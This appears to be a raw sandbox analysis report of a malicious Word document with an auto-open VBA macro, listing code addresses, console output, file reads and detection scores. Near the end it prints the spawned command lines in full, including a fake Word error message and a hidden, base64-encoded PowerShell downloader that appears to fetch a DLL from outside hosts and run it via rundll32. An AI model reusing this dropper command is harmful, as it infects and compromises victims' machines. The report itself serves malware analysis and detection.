                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100038E17_2_100038E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012CE37_2_10012CE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001A2E57_2_1001A2E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000E8F67_2_1000E8F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001EF97_2_10001EF9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006AFC7_2_10006AFC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100073067_2_10007306
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CF077_2_1001CF07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003F0A7_2_10003F0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10013F167_2_10013F16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100187217_2_10018721
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100197267_2_10019726
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C92D7_2_1001C92D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001732F7_2_1001732F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D5357_2_1000D535
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100163347_2_10016334
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014D397_2_10014D39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100037437_2_10003743
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F54C7_2_1000F54C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001894D7_2_1001894D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100109507_2_10010950
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011F547_2_10011F54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CB587_2_1001CB58
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BF697_2_1001BF69
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007B6A7_2_10007B6A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A16A7_2_1000A16A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019D6D7_2_10019D6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001197B7_2_1001197B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DD807_2_1001DD80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10017B8D7_2_10017B8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B5987_2_1001B598
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001539F7_2_1001539F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000799F7_2_1000799F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E9A27_2_1001E9A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000EBA47_2_1000EBA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100021C07_2_100021C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C1C27_2_1001C1C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100107D37_2_100107D3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100095DD7_2_100095DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D5DF7_2_1001D5DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100129E37_2_100129E3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F7EF7_2_1000F7EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100033F47_2_100033F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A7FA7_2_1000A7FA
                      Source: 79a2gzs3gkk.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module Tvh1u8793dltn9, Function Document_openName: Document_open
                      Source: 79a2gzs3gkk.docOLE indicator, VBA macros: true
                      Source: rundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@36/8@6/8
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$a2gzs3gkk.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBF39.tmpJump to behavior
                      Source: 79a2gzs3gkk.docOLE indicator, Word Document stream: true
                      Source: 79a2gzs3gkk.docOLE document summary: title field not present or empty
                      Source: 79a2gzs3gkk.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ........................................ .H.......H.....................H...............#...............................h.......5kU.............Jump to behavior
                      Source: C:\Windows\System32\msg.exeConsole Write: ................................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........N.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......h...............u.............}..v......}.....0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... u...............u.............}..v......}.....0.................N.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....P.}.....0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......N...............u.............}..v......}.....0...............(.N.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j......................u.............}..v.....$......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j..... u...............u.............}..v....(%......0...............x.N.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............,..j.....IN...............u.............}..v....`_......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7...............L..j.....`................u.............}..v.....`......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............,..j.....IN...............u.............}..v....`g......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C...............L..j.....h................u.............}..v.....h......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............,..j.....IN...............u.............}..v....`o......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O...............L..j.....p................u.............}..v.....p......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v.....t......0...............HFN.....(.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[...............L..j....hu................u.............}..v.....u......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.3.1.............}..v.....y......0...............HFN.....$.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g...............L..j.....z................u.............}..v....0{......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s...............L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............,..j.....IN...............u.............}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............L..j......................u.............}..v....0.......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............,..j.....IN...............u.............}..v.....!......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............L..j....."................u.............}..v....0#......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............,..j.....IN...............u.............}..v.....)......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............L..j.....*................u.............}..v....0+......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............,..j.....IN...............u.............}..v.....1......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............L..j.....2................u.............}..v....03......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v.....9......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j.....:................u.............}..v....0;......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v.....@......0.......................r.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j....8A................u.............}..v.....A......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v....`H......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j.....I................u.............}..v.....I......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................,..j.....IN...............u.............}..v.....N......0.......................r.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j.....O................u.............}..v.... P......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......,..j.....IN...............u.............}..v.....S......0...............HFN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................L..j....hT................u.............}..v.....T......0................FN.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....(................u.............}..v............0.................N.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....(................u.............}..v............0.................N.............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                      Source: 79a2gzs3gkk.docVirustotal: Detection: 57%
                      Source: 79a2gzs3gkk.docMetadefender: Detection: 32%
                      Source: 79a2gzs3gkk.docReversingLabs: Detection: 65%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQB